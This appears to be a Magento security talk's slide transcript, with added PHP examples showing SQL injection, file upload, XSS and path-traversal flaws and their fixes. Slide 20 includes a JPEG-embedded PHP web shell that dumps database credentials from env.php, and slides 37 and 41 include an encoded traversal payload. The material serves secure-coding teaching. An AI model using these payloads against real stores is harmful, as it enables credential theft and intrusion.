
Magento Security from Developer's and Tester's Points of View

Magento Security from Developer's and Tester's Points of View: the slides for Amasty's Lera and Alex's talk at Meet Magento ES 2017 in Madrid.

Published in: Technology

  1. Alexey Motorny: 5+ years in Magento development; all this time a proud member of the Amasty team; took part in 50+ Magento 1 and Magento 2 projects; Master of Science; Magento Certified Developer.
  2. Valeria Shevtsova: 5+ years of experience in testing; testing instructor; research degree in science; Head of QA department.
  3. WHY SECURITY IS CRUCIAL FOR ONLINE STORES: users' personal data, commercial confidentiality, money, users' trust.
  4. VULNERABILITIES, according to the Open Web Application Security Project (OWASP) Top 10:
       A1 – Injection
       A2 – Broken Authentication and Session Management
       A3 – Cross-site Scripting
       A4 – Insecure Direct Object References
       A5 – Security Misconfiguration
       A6 – Sensitive Data Exposure
       A7 – Insufficient Attack Protection
       A8 – Cross-site Request Forgery (CSRF)
       A9 – Using Components with Known Vulnerabilities
       A10 – Underprotected APIs
  5. TODAY'S SECURITY BLUEPRINT
       1. A1 Injections: 1.1 SQL injections, 1.2 File injections, 1.3 Code injections
       2. A3 - Cross-site scripting
       3. A4 - Insecure direct object references
       4. A2 - Broken authentication and session management
       5. A10 - API
       6. More security stuff
  6. TODAY'S SECURITY BLUEPRINT (the same agenda slide, repeated)
  7. 1.1 SQL INJECTIONS: PATTERNS
       1. Using GET/POST variables without validation and processing:
            $data = $model->getData($_GET['field_name']);
       2. Raw SQL queries, such as:
            $sql = "INSERT INTO $table (attribute_id, store_id, $entityIdName, `value`) ";
            $db->query($sql);
       3. Building the parameters of WHERE clauses by concatenation:
            $select->where('attribute_id = ' . $attributeId);
       4. The same goes for ->order(), ->join(), ->group() and the other SQL builder functions.
  8. 1.1 SQL INJECTIONS THROUGH FORMS: EXAMPLE
         $userdata = $connection->fetchRow(
             "SELECT firstname, lastname FROM admin_user WHERE username = '" . $observer->getUserName() . "'"
         );
  9. 1.1 SQL INJECTIONS THROUGH FORMS: RESULTS (screenshot)
  10. 1.1 SQL INJECTIONS THROUGH FORMS: PREVENTION
      BEFORE:
         $userdata = $connection->fetchRow(
             "SELECT firstname, lastname FROM admin_user WHERE username = '" . $observer->getUserName() . "'"
         );
      AFTER:
         $userdata = Mage::getModel('admin/user')->loadByUsername($observer->getUser()->getUsername());
  11. 1.1 SQL INJECTIONS VIA URLS: PATTERNS (screenshot)
  12. 1.1 SQL INJECTIONS VIA COOKIES: PATTERNS AND IMPLEMENTATION
         $userName = Mage::app()->getCookie()->get('current_user');
         $collection->getSelect()->where('username=' . $userName);
  13. 1.1 SQL INJECTIONS VIA COOKIES: PREVENTION
      BEFORE:
         $userName = Mage::app()->getCookie()->get('current_user');
         $collection->getSelect()->where('username=' . $userName);
      AFTER:
         $userName = Mage::app()->getCookie()->get('current_user');
         $collection->getSelect()->where('username=?', $userName);
  14. 1.1 SQL INJECTIONS VIA SYSTEM CONFIG DATA: PATTERNS AND IMPLEMENTATION
         $query = $query . ' WHERE date_time < NOW() - INTERVAL ' . $days . ' DAY';
         Mage::getSingleton('core/resource')->getConnection('core_write')->query($query);
  15. 1.1 SQL INJECTIONS VIA SYSTEM CONFIG DATA: PREVENTION
         $days = (int)$days;
         $query = "DELETE FROM `$tableLoginAttemptsName`";
         $query = $query . ' WHERE date_time < NOW() - INTERVAL :days DAY';
         Mage::getSingleton('core/resource')->getConnection('core_write')
             ->query($query, array('days' => $days));
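The cookie lookup of slides 12 and 13 and the numeric cast of slide 15, rebuilt as an added example (not the slides' code) on PDO with an in-memory SQLite table so it runs without Magento; the table contents and the cookie value are constructed.

```php
<?php
// Added example (not from the slides): the cookie-driven lookup of slides 12-13
// rebuilt on PDO + SQLite so it runs without Magento. In Magento 1 the same
// contrast is $select->where('username=' . $v) versus ->where('username=?', $v);
// the bound form of slide 15 is $connection->query($sql, array('days' => (int)$days)).

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE admin_user (username TEXT, firstname TEXT, lastname TEXT)');
$db->exec("INSERT INTO admin_user VALUES ('alice', 'Alice', 'Admin'), ('bob', 'Bob', 'Ops')");

// BEFORE (slide 12): the cookie value is glued into the statement text, so
// quote characters inside it become part of the SQL.
function lookupConcat(PDO $db, string $userName): array
{
    $sql = "SELECT firstname, lastname FROM admin_user WHERE username = '" . $userName . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// AFTER (slide 13): the cookie value travels as a bound parameter; whatever it
// contains, the statement keeps the shape "username = <one string>".
function lookupBound(PDO $db, string $userName): array
{
    $stmt = $db->prepare('SELECT firstname, lastname FROM admin_user WHERE username = ?');
    $stmt->execute([$userName]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed cookie value: a closing quote followed by an always-true condition,
// the kind of input a tester sends when "checking user cookies" (slide 45).
$cookieValue = "bob' OR '1'='1";

// The concatenated query matches every admin_user row; the bound query matches
// none, because no account is literally named "bob' OR '1'='1".
printf("concatenated: %d row(s)\n", count(lookupConcat($db, $cookieValue)));
printf("bound:        %d row(s)\n", count(lookupBound($db, $cookieValue)));

// Numeric configuration (slide 15): cast first, then bind. The cast reduces a
// string such as "30; DROP TABLE admin_user" to plain 30; the bind keeps the
// statement text fixed.
$days = (int)'30; DROP TABLE admin_user';
$stmt = $db->prepare('SELECT :days AS days');
$stmt->execute(['days' => $days]);
printf("bound days:   %d\n", $stmt->fetchColumn());
```

The same rule covers ->order(), ->join() and ->group() from slide 7: values go through placeholders or quoteInto(), and column or table names through an allow-list, since placeholders cannot carry identifiers.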
  16. 1.2 FILE INJECTION: IMPLEMENTATION
      http://example.com/pub/media/customer/c/o/code.php
      The .htaccess of the media/customer directory:
         Order deny, allow
         Deny from all
  17. 1.2 FILE INJECTION: IMPLEMENTATION
      http://example.com/media/customer/_/h/.htaccess
         <IfModule mod_php5.c>
             php_flag engine 1
         </IfModule>
         <IfModule mod_php7.c>
             php_flag engine 1
         </IfModule>
         Order deny, allow
         deny from all
      http://example.com/media/customer/_/h/.hcode.php
  18. 1.2 FILE INJECTION: IMPLEMENTATION (screenshot)
  19. 1.2 FILE INJECTION: PREVENTION
       1. Forbid uploading PHP files.
       2. Block .htaccess uploading.
       3. Implement file uploading via the Magento Uploader.
  20. 1.2 FILE INJECTION: IMAGE INJECTION EXAMPLE
      http://example.com/media/customer/_/h/.htaccess
         AddType application/x-httpd-php .jpg
         Order deny, allow
         deny from all
      jhead -ce apple.jpg
         <h1>
         <?php
         if (isset($_REQUEST['cmd'])) {
             $test = require_once("../../../../../app/etc/env.php");
             var_dump($test["db"]);
         } else {
             echo '<img src="./.h-apple-orig.jpg" border=0>';
         }
         ?>
         </h1>
  21. 1.2 FILE/CODE INJECTION EXAMPLE
      http://example.com/pub/media/customer/_/h/.h-apple.jpg?cmd=test
  22. 1.2 FILE/CODE INJECTION: PREVENTION (BEFORE / AFTER)
         $uploader = new Mage_Core_Model_File_Uploader('image');
         if ($allowed = $this->getAllowedExtensions($type)) {
             $uploader->setAllowedExtensions($allowed);
         }
         $uploader->setAllowRenameFiles(true);
         $uploader->setFilesDispersion(false);
         $uploader->addValidateCallback(
             Mage_Core_Model_File_Validator_Image::NAME,
             Mage::getModel('core/file_validator_image'),
             'validate'
         );
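A stand-alone upload check that applies the three prevention points of slide 19 and the extension/content validation of slide 22, as an added example that is not the slides' or Magento's code; the function and constant names are assumptions, and the sample files are constructed.

```php
<?php
// Added example (not the slides' code): a pre-save check for a customer file
// upload that enforces the three prevention points of slide 19. Magento's own
// Uploader does this through setAllowedExtensions() and the image validator
// callback of slide 22; the function and constant names below are assumptions.

const ALLOWED_IMAGE_EXT = ['jpg', 'jpeg', 'png', 'gif'];

/** Returns null when the upload is acceptable, otherwise the rejection reason. */
function validateCustomerUpload(string $clientName, string $bytes): ?string
{
    // 1. No dotfiles: stops an uploaded .htaccess (slides 17 and 20) and the
    //    ".h-apple.jpg" naming used there.
    $base = basename($clientName);
    if ($base === '' || $base[0] === '.') {
        return 'dotfiles are not allowed';
    }
    // 2. Every extension in the name must be on the allow-list, not just the
    //    last one, so "code.php" and "code.php.jpg" are both refused.
    $parts = explode('.', strtolower($base));
    array_shift($parts);                        // drop the base name
    if ($parts === [] || array_diff($parts, ALLOWED_IMAGE_EXT) !== []) {
        return 'extension not allowed';
    }
    // 3. The bytes must decode as an image, which is what
    //    Mage_Core_Model_File_Validator_Image checks via getimagesize().
    $img = @getimagesizefromstring($bytes);
    if ($img === false) {
        return 'content is not an image';
    }
    // 4. The detected image type must match the claimed extension.
    $claimed  = end($parts) === 'jpg' ? 'jpeg' : end($parts);
    $detected = image_type_to_extension($img[2], false);
    if ($detected !== $claimed) {
        return 'extension does not match content';
    }
    return null;
}

// Constructed inputs: a genuine 1x1 GIF and a PHP source file.
$gif = base64_decode('R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7');
$php = "<?php echo 'constructed'; ?>";

$cases = [['apple.gif', $gif], ['apple.jpg', $gif], ['code.php', $php],
          ['code.php.jpg', $php], ['.htaccess', 'php_flag engine 1']];
foreach ($cases as [$name, $data]) {
    printf("%-13s %s\n", $name, validateCustomerUpload($name, $data) ?? 'accepted');
}
```

The JPEG of slide 20 is a valid image and passes checks 3 and 4 by design, which is why content validation alone is not enough: the media directory must also refuse to execute PHP and reject .htaccess uploads, as slides 16 and 19 require.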
  23. TODAY'S SECURITY BLUEPRINT (agenda slide, repeated as a section divider)
  24. 2. CROSS-SITE SCRIPTING: PATTERNS
      CONTROLLER:
         $customData = $this->getRequest()->getParams();
         $model->setCustomData($customData);
         $model->save();
      VIEW:
         <?php echo $model->getCustomData() ?>
  25.-29. 2. CROSS-SITE SCRIPTING: IMPLEMENTATION (five screenshot slides)
  30. 2. CROSS-SITE SCRIPTING: PREVENTION
         $value = $this->helper->escapeHtml($value);
      Signature of the helper method:
         public function escapeHtml($data, $allowedTags = null)
  31.-33. 2. CROSS-SITE SCRIPTING: ADMIN ACCESS (three screenshot slides)
  34. TODAY'S SECURITY BLUEPRINT (agenda slide, repeated as a section divider)
  35. 3. INSECURE DIRECT OBJECT REFERENCES
  36. 3. INSECURE DIRECT OBJECT REFERENCES: REVEALING VULNERABILITIES
         $file = $this->getRequest()->getParam('file');
         $fileName = CustomerMetadataInterface::ENTITY_TYPE_CUSTOMER . '/' . $file;
      With $file = '../../../app/etc/env.php' the path becomes
         /var/www/html/magento/pub/media/customer/../../../app/etc/env.php
  37. 3. INSECURE DIRECT OBJECT REFERENCES: FILE NAME REPLACEMENT
      http://example.com/amcustomerattr/index/viewfile/file/Li4vLi4vLi4vYXBwL2V0Yy9lbnYucGhw/customer_id/1/
  38. 3. INSECURE DIRECT OBJECT REFERENCES: RESULTS (screenshot)
  39. 3. INSECURE DIRECT OBJECT REFERENCES: PREVENTION
         $file = Uploader::getCorrectFileName($file);

         /**
          * Correct filename with special chars and spaces
          *
          * @param string $fileName
          * @return string
          */
         public static function getCorrectFileName($fileName)
         {
             // '/' and every other character outside the class becomes '_',
             // so '../' can no longer step out of the directory
             $fileName = preg_replace('/[^a-z0-9_\-\.]+/i', '_', $fileName);
             $fileInfo = pathinfo($fileName);
             if (preg_match('/^_+$/', $fileInfo['filename'])) {
                 $fileName = 'file.' . $fileInfo['extension'];
             }
             return $fileName;
         }
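The file-parameter handling of slides 36 to 39 carried through end to end, as an added example (not the slides' or Magento's code): the sanitiser is the Magento-style getCorrectFileName() of slide 39, while resolveCustomerFile() and the temporary directory standing in for pub/media/customer are assumptions.

```php
<?php
// Added example (not the slides' code): resolving the 'file' request parameter
// of slides 36-39. getCorrectFileName() is the Magento-style sanitiser from
// slide 39; resolveCustomerFile() and the temporary directory are assumptions.

function getCorrectFileName(string $fileName): string
{
    $fileName = preg_replace('/[^a-z0-9_\-\.]+/i', '_', $fileName);
    $fileInfo = pathinfo($fileName);
    if (preg_match('/^_+$/', $fileInfo['filename'])) {
        $fileName = 'file.' . ($fileInfo['extension'] ?? '');
    }
    return $fileName;
}

/** Absolute path of the requested file inside $customerDir, or null if it would leave it. */
function resolveCustomerFile(string $customerDir, string $param): ?string
{
    $root = realpath($customerDir);
    $real = realpath($customerDir . '/' . getCorrectFileName($param));
    // realpath() collapses any surviving '..' and symlinks; the prefix test is
    // the actual decision and does not depend on how the name was cleaned.
    if ($root === false || $real === false
        || strpos($real, $root . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

// Constructed stand-in for pub/media/customer holding one legitimate file.
$customerDir = sys_get_temp_dir() . '/mm_customer_' . getmypid();
@mkdir($customerDir, 0700);
file_put_contents($customerDir . '/1.jpg', 'constructed image bytes');

// The 'file' segment of the slide-37 URL, decoded: a traversal path, not a name.
$param = base64_decode('Li4vLi4vLi4vYXBwL2V0Yy9lbnYucGhw');
printf("decoded param : %s\n", $param);
printf("sanitised name: %s\n", getCorrectFileName($param));
printf("traversal     : %s\n", resolveCustomerFile($customerDir, $param) ?? 'refused');
printf("plain 1.jpg   : %s\n", resolveCustomerFile($customerDir, '1.jpg') ?? 'refused');

unlink($customerDir . '/1.jpg');
rmdir($customerDir);
```

The customer_id segment of the same URL still needs its own ownership check before the file is served; the unguessable ids of slide 41 make enumeration harder but do not replace that authorisation step.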
  40. TODAY'S SECURITY BLUEPRINT (agenda slide, repeated as a section divider)
  41. 4. DIRECT LINK ACCESS
      EXAMPLES:
         http://example.com/media/customer/passport/1.jpg
         http://example.com/media/customer/passport/2.jpg
      PREVENTION:
         http://example.com/amcustomerattr/index/viewfile/file/Li4vLi4vLi4vYXBwL2V0Yy9lbnYucGhw/customer_id/7dc4acc58270/
  42. TODAY'S SECURITY BLUEPRINT (agenda slide, repeated as a section divider)
  43. 5. UNDERPROTECTED APIS
  44. MORE SECURITY STUFF
       1. When buying extensions from Magento vendors, always pay attention to security questions.
       2. Install security patches in time.
       3. Use additional backend security measures.
       4. Check whether user and admin passwords are strong enough.
       5. Use security extensions.
       6. Configure your servers for safety.
  45. DETECT VULNERABILITIES LIKE A BOSS
       1. Look for unwanted access to users' data via direct links.
       2. Look for known patterns.
       3. Check forms and URLs to prevent SQL and JavaScript injections.
       4. Check user cookies.
       5. Make sure the admin area has no security holes.
       6. Test file uploading via file upload inputs.
  46. TIPS ON WRITING SAFE APPLICATIONS FOR MAGENTO
       1. Make sure your server environment is configured for safety.
       2. Validate all incoming data.
       3. Data escaping is a must!
       4. Check the extension for access to important files.
       5. Data validation for the API is a must.
       6. Use Magento functions.
  47. THANK YOU!
